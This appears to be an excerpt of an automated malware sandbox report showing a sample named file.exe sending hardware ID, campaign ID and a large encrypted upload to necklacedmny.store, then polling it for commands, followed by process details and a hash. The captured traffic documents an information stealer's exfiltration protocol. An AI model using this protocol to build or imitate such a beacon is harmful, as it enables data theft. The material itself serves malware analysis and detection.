Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49725	188.114.96.3	443	2748	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 05:59:14 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19968 Host: necklacedmny.store
2024-10-29 05:59:14 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 44 36 30 32 37 45 46 44 45 45 30 33 38 36 38 39 44 37 38 44 33 31 38 32 37 41 37 30 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"43D6027EFDEE038689D78D31827A7048--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-29 05:59:14 UTC	4637	OUT	Data Raw: f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 Data Ascii: +?2+?2+?o?Mp5p
2024-10-29 05:59:15 UTC	1027	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 05:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dqj7tleff2p6cp4cg7vbsdopda; expires=Fri, 21 Feb 2025 23:45:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UzCNnvCDD8%2BN4Xf%2F6jBua55y3y47f%2BwBFN%2Bi1b8QibB96bD4mOEmsp1npVpXlWubpzCbc%2F40r2Cp1Rikgwm100%2BJe8VHZ0WfbPjhivxZjs7d50bn%2BU7D5EB85%2F8vq2aiyxOwbMs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da0f03ddcbf4761-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1171&sent=12&recv=27&lost=0&retrans=0&sent_bytes=2845&recv_bytes=20932&delivery_rate=2578806&cwnd=246&unsent_bytes=0&cid=8321c3c449c1a561&ts=844&x=0"
2024-10-29 05:59:15 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-10-29 05:59:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49737	188.114.96.3	443	2748	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 05:59:16 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1244 Host: necklacedmny.store
2024-10-29 05:59:16 UTC	1244	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 44 36 30 32 37 45 46 44 45 45 30 33 38 36 38 39 44 37 38 44 33 31 38 32 37 41 37 30 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"43D6027EFDEE038689D78D31827A7048--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-29 05:59:18 UTC	1019	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 05:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ab7m7tcbo4o3ba8928drje0q2i; expires=Fri, 21 Feb 2025 23:45:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lPeg5%2Fhm7P0c0zdZSbj2KGPOWucWxNnHbbgStETUJISsYjvTXE59jhbQ13XxDw0ooeibzLdr5G73kfkZWjEGJcSpHSkqH6DGzrMy%2F6OKk%2BmkoBn%2FYXYYj9imqAMp6gJMw%2FeCkCs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da0f049394a3ab6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2163&delivery_rate=2594982&cwnd=251&unsent_bytes=0&cid=6870360b866d45d8&ts=1438&x=0"
2024-10-29 05:59:18 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-10-29 05:59:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49747	188.114.96.3	443	2748	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 05:59:19 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 572511 Host: necklacedmny.store
2024-10-29 05:59:19 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 44 36 30 32 37 45 46 44 45 45 30 33 38 36 38 39 44 37 38 44 33 31 38 32 37 41 37 30 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"43D6027EFDEE038689D78D31827A7048--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-29 05:59:19 UTC	15331	OUT	Data Raw: aa 14 50 19 83 72 5a 60 57 1b 77 e6 8c 02 c8 74 21 82 06 fa eb 11 fe 73 b8 41 76 68 4b 65 b9 6c 76 42 b7 6b a3 f7 33 c3 05 8e 9a ea 08 cb 73 e3 a5 01 ce 9b a5 ff dd 57 f0 ff 7d c9 00 f4 8a 6e 30 8b 03 89 16 d4 62 2e 60 d7 fe 5a ce 64 da 64 8e c6 fa a6 b0 4b 28 7e db 50 bc 9d 94 90 83 71 f0 56 9c b9 73 cf af a6 27 37 20 02 2e a6 65 3b 7b e2 40 9b 32 ef 0f 0b 74 fc b6 3c e7 6a 48 49 03 a6 6e 13 54 ea d0 02 36 df 66 46 26 bd 33 67 8b f5 c9 d1 5d 78 50 dc 68 44 ca 93 c5 29 0d fe 77 dd 64 6a 9d 95 a2 f6 30 ac c0 aa 04 76 1e fc 1f 95 55 98 f2 b3 98 39 0a 12 13 04 b9 2b 73 9b 5d c4 79 a4 15 e5 06 ee 62 8e 6f a8 a6 30 99 44 43 bc 8e f0 86 dc ca a7 10 d8 78 5b e9 83 48 53 2c ec ff 13 5a db 8a 53 35 bb 63 1d 56 a9 ec 00 91 27 9a 1b 3b d3 3a f9 13 e6 57 eb ea ec 63 Data Ascii: PrZ`Wwt!sAvhKelvBk3sW}n0b.`ZddK(~PqVs'7 .e;{@2t<jHInT6fF&3g]xPhD)wdj0vU9+s]ybo0DCx[HS,ZS5cV';:Wc
2024-10-29 05:59:19 UTC	15331	OUT	Data Raw: c9 2f 8c 01 82 be 30 22 53 92 82 9d 40 89 a4 2d 87 c0 dc cd 45 49 f1 09 b1 0e c8 75 35 62 53 65 58 d6 09 96 0f 43 98 45 5a cd 9a 57 99 75 ee e3 e6 a2 4f 47 6f 67 fc 7a 5c cd a2 42 db ef 32 3b 8b ff 1a ec 36 16 80 b5 8a 1d 31 a2 4c a7 3c 34 92 ef 5b 45 35 9b 52 ef 73 65 2f 32 24 36 87 35 03 70 97 cc d9 c1 82 64 21 7e 28 09 bc fc 1e fd 44 b5 cc 90 9e bb a3 c5 78 63 fb 51 d5 a4 39 44 de 55 5b e7 b0 b2 3b b1 8f b7 21 c1 76 15 d8 31 c4 25 a5 ec 54 f5 e7 97 b1 a3 91 4c f5 d2 a1 74 31 b3 56 86 3c 34 69 d4 48 6e d1 6b a2 24 2d eb ff 05 96 c2 31 49 0a 6a 93 22 54 02 fb c6 c7 03 c7 6e 0e e0 ed 73 92 c0 52 66 28 69 e6 89 30 69 6a 7a 75 e2 0d a5 96 5f b1 37 bd b4 47 7f 63 fa 38 15 89 2d 84 2d 2a e4 ab 27 65 9c 1c ec 57 2d a6 1e 76 09 9a c3 91 26 83 6a 90 23 9d e5 58 Data Ascii: /0"S@-EIu5bSeXCEZWuOGogz\B2;61L<4[E5Rse/2$65pd!~(DxcQ9DU[;!v1%TLt1V<4iHnk$-1Ij"TnsRf(i0ijzu_7Gc8--*'eW-v&j#X
2024-10-29 05:59:19 UTC	15331	OUT	Data Raw: d4 00 ee 1d 5e c5 68 78 b3 55 b0 d9 bd c0 8b bd 6f f5 dc 66 d3 ba 73 1b ef 98 e4 05 7e e0 55 ac 4c 17 19 ff 3a f4 ae bf 5c 2c df e2 1e c1 f8 0c cc 7c 4c 0b 9b d6 68 61 fc 6d b0 33 b3 be e3 27 c6 e8 0a 71 4b 97 81 c5 e4 6b 2b 38 df fd ae 29 d1 a1 71 66 ac e2 61 45 da 23 7d f1 bf c9 75 ad d5 55 45 36 9c bc bf e5 04 d3 5f e6 9a 8f 7c ef 9e 6a ff 37 3c 50 87 a8 7a 4c ea c3 1c b8 7f 6c 7f ec e4 8a 36 9b 5a fd e5 54 da 42 70 e3 5a 6c d9 17 c3 eb e3 77 d6 8c a6 f8 8e d3 52 43 59 b9 57 ff 3a b1 e9 fd c9 50 81 16 e2 f8 f5 5b ec c6 d4 82 ac 15 be 70 66 a1 2a 21 fd 5c e8 7c 7f 98 c3 a7 fa ea bf dd e5 7e ca b5 5e 6c e5 54 8d 45 88 a4 06 fa 0f b2 d4 64 7c 96 27 d6 5e 7a 2f 9f 36 e1 03 ed 4b 9c 98 59 86 bd 23 56 a9 e2 80 a2 ea 30 ad fd d7 70 cf 7e 4e 27 87 15 aa e0 be Data Ascii: ^hxUofs~UL:\,\|Lham3'qKk+8)qfaE#}uUE6_\|j7<PzLl6ZTBpZlwRCYW:P[pf*!\\|~^lTEd\|'^z/6KY#V0p~N'
2024-10-29 05:59:19 UTC	15331	OUT	Data Raw: ee b6 1a 08 e5 5e c5 23 e8 1a 7f 65 e5 a5 4f d2 5c ad 1d de 18 98 e3 32 4b c1 8c 1e 99 ac 17 b7 ab 06 83 04 e1 77 ab 51 45 ce 69 62 71 fa 8d 34 68 c1 0a 63 1c 84 18 eb c1 9e b8 42 63 3a 01 74 e1 0b e3 37 a7 15 0d 45 6f f5 a6 e4 47 d2 3b f2 0c 95 30 dc 5f 05 cf 37 91 9e d7 0e ca 9f e7 83 6a 08 e0 7c b3 d8 13 16 75 82 d9 97 53 90 b6 d5 23 bc fb d1 23 67 51 f7 b1 4f 1e 26 2b 40 89 d4 15 10 1a f5 52 36 0b 5f 84 0d ed de 65 c3 85 91 90 eb 56 67 b1 a4 07 f9 4a 76 84 e6 bf fd c8 56 03 45 4d 41 25 ab e8 5f 27 c9 f1 02 02 7f e6 58 29 d7 e6 72 d7 78 6b fd 95 35 2e 60 f7 db f4 81 08 a8 a0 d5 d4 15 5d 6a e3 df bb 7a ee c2 c2 c9 f3 7e 49 8b 36 c7 2a 7e b9 1f 7b c7 34 3f ef fc 88 4e 5e e0 f9 cf dc a7 63 5f 99 fb 32 9a 6e 94 0c f3 fd ff ce d9 75 49 50 fa 8b 07 a9 04 f3 Data Ascii: ^#eO\2KwQEibq4hcBc:t7EoG;0_7j\|uS##gQO&+@R6_eVgJvVEMA%_'X)rxk5.`]jz~I6*~{4?N^c_2nuIP
2024-10-29 05:59:19 UTC	15331	OUT	Data Raw: 84 4c a1 1c 08 f6 12 1e 39 58 da 56 cd 7b 05 84 38 4d 73 bc 72 51 51 3e c4 dd 6d d2 25 93 97 84 8d 9a c0 60 f2 96 13 cc 9c a0 91 a0 3a 93 13 0f 28 0d 56 05 c6 e1 1e f9 b0 92 e0 e2 fb 80 49 87 79 fc 91 17 22 0d 4e 51 bf 65 8f 10 3f 24 98 db 86 79 71 de b3 4b 8b e5 5a 1e 6c 9a 97 4f 1b 4d d2 4b fe 9d 15 47 99 bb 44 5e a0 de ec dc 75 d2 90 e1 f4 a1 f6 4e aa e2 32 43 37 93 5e 22 6a 74 25 64 f6 2b b9 2e a8 58 a7 f6 a7 88 9a 4a dc 07 7b 58 17 eb e7 05 3e 62 13 9d ce 63 32 4c f5 4a f0 2e 9a f8 b5 43 47 c3 1c 8f 24 0e 91 4e 8d cd 50 a6 b5 6a c5 ea 7c df e7 dc dd 3b 20 f1 f8 0d 55 6b 9b c8 1b 51 84 d9 9b af 6b 35 10 7e 04 40 2a 63 7e 58 27 9f 41 e9 61 1b e7 9f 28 03 7a 99 39 97 8a 7c 65 14 a1 f0 68 e2 74 d4 e6 ed 00 0d b5 66 e4 36 f6 e6 47 89 8f f4 95 9a 24 25 7e Data Ascii: L9XV{8MsrQQ>m%`:(VIy"NQe?$yqKZlOMKGD^uN2C7^"jt%d+.XJ{X>bc2LJ.CG$NPj\|; UkQk5~@*c~X'Aa(z9\|ehtf6G$%~
2024-10-29 05:59:19 UTC	15331	OUT	Data Raw: a9 2b c6 af 14 b7 a1 66 fa 83 50 ac ab 87 55 6e f4 06 5f 0a a3 a5 47 15 68 b1 8f 70 37 46 83 c8 0c 7a 98 8f 1f 49 45 8d ab 05 41 84 78 95 4a b4 49 da 61 f0 70 de 29 60 eb 6d e3 0c 79 7a f2 c7 e1 35 85 97 b3 91 cb 5a e4 84 21 f4 46 4e a0 dc 60 a5 0e 14 f6 84 4b 42 49 af 69 a3 70 f7 ce 69 3f e5 ae 60 90 4b 78 02 17 fc f7 89 03 e1 7d 24 c6 50 4c b4 cc 32 51 65 8c fb 3a 14 15 1a 7e 94 11 ca d5 22 0c 33 c4 16 19 d6 47 5d af 1b 59 39 61 b6 a2 16 b0 3f cf d1 a7 58 16 09 4e 2f 03 3d cc 54 b2 67 2b 77 78 d6 fa 93 2a 57 24 a6 d4 6a cb d0 71 22 ae 0d a5 5b a2 50 9d f8 23 4a 91 60 58 b3 16 17 31 8e 1c bb c6 df d0 e3 63 7f 05 6f 60 e5 3c 64 e1 84 d8 18 16 ff c8 f0 23 27 e1 10 86 58 8b d9 c4 9e 7b 6b f6 8a e1 c1 47 f6 2c de 90 9b c8 f3 6c 22 97 6c 5f 86 5e 34 19 a9 2e Data Ascii: +fPUn_Ghp7FzIEAxJIap)`myz5Z!FN`KBIipi?`Kx}$PL2Qe:~"3G]Y9a?XN/=Tg+wx*W$jq"[P#J`X1co`<d#'X{kG,l"l_^4.
2024-10-29 05:59:19 UTC	15331	OUT	Data Raw: 0c bc af 2c dc f7 64 82 3f b1 1c 3f 74 7d 67 f7 65 ca a9 4d 25 4f c0 e1 78 03 a5 4a 01 26 9a 20 ef cb 86 05 07 3c e6 b8 31 7d 0d f7 48 3e 65 f0 a8 c1 b9 9c d8 f4 73 c3 ac db 6f 91 ce 32 85 c7 1a 0a 21 c1 f2 a8 95 fb db c9 c9 51 e5 21 fd c4 a2 2f b5 af 59 d6 53 37 9b 52 dc d4 f9 e9 f9 91 57 c2 52 0e c6 f4 2d 1b b7 2c 7e 41 fe 1d a4 3b 36 ab 47 0f 62 89 0e 62 c2 28 32 cc b8 31 97 a6 5e 2e f2 5d c7 8d f8 f6 36 8f 09 d0 35 aa b9 be 07 88 6d 40 27 16 ee fc 6d b6 cc 18 38 2f 7a 7d 73 95 61 b9 ac a8 27 6a 67 97 4d cc 12 01 2b aa 44 2f af 31 89 1f 95 75 ed 81 b3 10 5c f5 38 c9 92 ac de 23 70 7f 04 1a fb 8d 80 6d f4 6b d9 c6 8c 3d 40 30 cb b4 1b 11 9f 2e ce 73 92 2c 39 25 8f 7f 16 a9 69 88 5f d0 87 eb 97 f8 c0 97 c8 82 8a 3b 70 a8 f0 11 5a 82 2a b0 9b f9 3b fe 8c Data Ascii: ,d??t}geM%OxJ& <1}H>eso2!Q!/YS7RWR-,~A;6Gbb(21^.]65m@'m8/z}sa'jgM+D/1u\8#pmk=@0.s,9%i_;pZ*;
2024-10-29 05:59:19 UTC	15331	OUT	Data Raw: c1 b1 00 c9 23 44 e4 8d e2 02 8e 92 e5 48 f6 5d 24 57 be fc ac eb 3f 32 ea d0 39 df 6c 8d 42 84 b1 c7 16 72 97 94 31 a0 78 ce 10 22 d0 d3 b5 98 e6 14 14 62 f3 e7 24 70 de 93 e2 56 e3 83 be 6a e6 b4 18 ad 26 e4 1a 00 a2 9f 50 cd 9c 98 f1 de a0 5e 91 36 bd 59 1f 44 a4 11 69 7a 4a 5b 34 7e 77 92 24 ef 4d 1f 0d 0d 94 7f e5 5e 88 c8 ae 7e 10 2e 95 c3 42 f2 35 71 cc 15 1d eb c5 10 ef a7 cb c6 78 27 47 e8 c3 7c af 16 f2 3d 07 38 3d 45 70 a8 0f 4a cf 9f d0 69 e5 79 78 25 2c f3 f4 1e 36 10 08 e6 e2 78 37 6b 6a 15 81 e4 11 2a 95 cd 4c af 40 cc df 5f 85 be 89 c5 f5 87 fa 82 17 7d 73 67 3a 9a 5c d0 a1 3d bb c9 eb 8d c7 70 65 0c 57 85 c2 c6 90 7e 6c 9c ee 27 d9 d4 30 19 80 98 ae e5 3c dd 81 49 1e e5 63 ce a2 96 ea 83 c3 88 8d e1 b7 6d 77 5a 94 d9 11 a9 c3 03 6b 27 49 Data Ascii: #DH]$W?29lBr1x"b$pVj&P^6YDizJ[4~w$M^~.B5qx'G\|=8=EpJiyx%,6x7kj*L@_}sg:\=peW~l'0<IcmwZk'I
2024-10-29 05:59:19 UTC	15331	OUT	Data Raw: 88 85 5c 86 62 6a ab 6f 9c b3 40 d0 d2 16 c2 cb 50 48 74 9d fd d6 c5 f1 54 ec e6 3e 54 ae 2a 39 66 ca ef 81 9f 19 88 f1 b1 18 80 63 d7 4f 62 90 da d8 23 ad 7c be 7a e5 8e 3e 2b dc 52 3d cc e0 00 10 9e 7f bb d5 5d 6b 54 5b 93 21 c1 d9 0e 5e 4c 09 14 22 d8 e4 ae d1 7b 46 f8 3d 67 1e 4f f8 16 71 f6 8a 59 72 eb 83 3b e4 e5 dd 8e b0 a6 40 59 77 9c 74 80 b5 c7 72 83 a0 7a 1b 8a ec 20 81 62 ba 8b c2 94 30 7f ec 26 7a 75 44 e3 53 78 de e8 cc c5 42 77 28 c3 d9 53 59 c2 13 a6 b9 ca cd 98 f7 44 7f 52 73 ab 8e 08 89 e1 ec 53 88 f5 8b 41 f2 64 8d 91 04 9f 0d bb c1 9a 67 02 a9 7f dc 07 e8 b1 a0 ee 4f 96 2a 83 f8 35 2e de 20 cc a0 8c 1d 20 d7 ca 92 3e e1 62 62 10 82 cb 4c f7 c3 4d 0e b2 d8 e3 cb a7 3e e1 20 c0 3f eb ed fe 59 3e 7b e3 f0 99 9b 2b 82 e0 cd 5e 9b be e8 6b Data Ascii: \bjo@PHtT>T9fcOb#\|z>+R=]kT[!^L"{F=gOqYr;@Ywtrz b0&zuDSxBw(SYDRsSAdgO5. >bbLM> ?Y>{+^k
2024-10-29 05:59:21 UTC	1029	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 05:59:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4butfpobjojqbn92vlcbso1jqj; expires=Fri, 21 Feb 2025 23:45:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BnN64v1qggHJyX0haxP6bhaRLTsmyFy9T2gH3Gjd3e0g%2FB5m%2BI6Ba%2Fd0JbvzYin%2FfJ3en1LRfPJKCYsBgmL8G3%2FdqDDsl5dqL8Rb2HHBiZ6p%2FpvNjrR8I0yfISoAUORYY52pgas%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da0f0597e45468a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2047&sent=220&recv=615&lost=0&retrans=0&sent_bytes=2844&recv_bytes=575060&delivery_rate=1645454&cwnd=247&unsent_bytes=0&cid=0b67c9956420d3bf&ts=2018&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49763	188.114.96.3	443	2748	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 05:59:22 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: necklacedmny.store
2024-10-29 05:59:22 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 34 33 44 36 30 32 37 45 46 44 45 45 30 33 38 36 38 39 44 37 38 44 33 31 38 32 37 41 37 30 34 38 Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=43D6027EFDEE038689D78D31827A7048
2024-10-29 05:59:23 UTC	1013	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 05:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ckq68h7u8vd754hf59s1likmc2; expires=Fri, 21 Feb 2025 23:46:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qnntuhcHF5GqY11Aehkj8q40Gj0fXtFvrgjpTeHrv1T6ZT79jrYSI4RLSKrV9GPQ0hrPLe3DXaxWdZMTNFOGH9OeivhsSj%2BQ2nqwq%2FPUyV1vxaeGQeFTIc%2Bj6s87IKu0PQ9cx4I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da0f06e08a82e24-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1406&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=989&delivery_rate=2080459&cwnd=251&unsent_bytes=0&cid=55df3db0e24ae32d&ts=484&x=0"
2024-10-29 05:59:23 UTC	130	IN	Data Raw: 37 63 0d 0a 38 69 4d 42 41 31 71 56 56 45 4e 78 70 76 6c 66 72 77 79 75 69 36 45 36 4a 74 36 6d 50 45 49 2b 64 68 53 57 73 62 4c 39 54 41 4b 70 57 43 4e 32 65 4b 39 32 4b 77 58 53 69 57 58 7a 49 2f 4b 6b 6b 41 49 54 38 4a 51 4e 64 78 42 48 4a 61 57 66 67 38 73 51 4c 5a 31 46 5a 31 39 31 38 54 45 6c 58 38 4f 42 4f 6f 30 67 6a 4f 33 56 47 42 7a 75 69 68 34 6e 48 45 77 6b 36 2b 77 3d 0d 0a Data Ascii: 7c8iMBA1qVVENxpvlfrwyui6E6Jt6mPEI+dhSWsbL9TAKpWCN2eK92KwXSiWXzI/KkkAIT8JQNdxBHJaWfg8sQLZ1FZ1918TElX8OBOo0gjO3VGBzuih4nHEwk6+w=
2024-10-29 05:59:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	01:59:06
Start date:	29/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x730000
File size:	2'955'264 bytes
MD5 hash:	6F748A450E7266ED42EC5C20759179B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
